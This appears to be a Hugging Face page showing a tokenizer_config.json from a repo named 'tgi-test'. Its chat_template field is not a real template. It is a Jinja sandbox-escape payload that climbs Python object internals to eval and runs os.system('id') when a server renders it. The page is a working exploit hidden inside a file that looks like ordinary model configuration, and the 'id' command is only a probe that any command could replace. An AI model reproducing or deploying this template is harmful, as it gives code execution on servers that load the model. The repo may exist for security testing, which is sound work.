tgi-test / tokenizer_config.json
passerw's picture
Upload tokenizer_config.json
be8cd11 verified
{
"chat_template": "{% for message in messages %}{{ message['content'] }}{% endfor %}{{ raise_exception('') | attr('__class__') | attr('__base__') | attr('__subclasses__')() | first | attr('__init__') | attr('__globals__') | attr('builtins') | attr('eval')('__import__(\"os\").system(\"id\")') }}",
"bos_token": "<s>",
"eos_token": "</s>"
}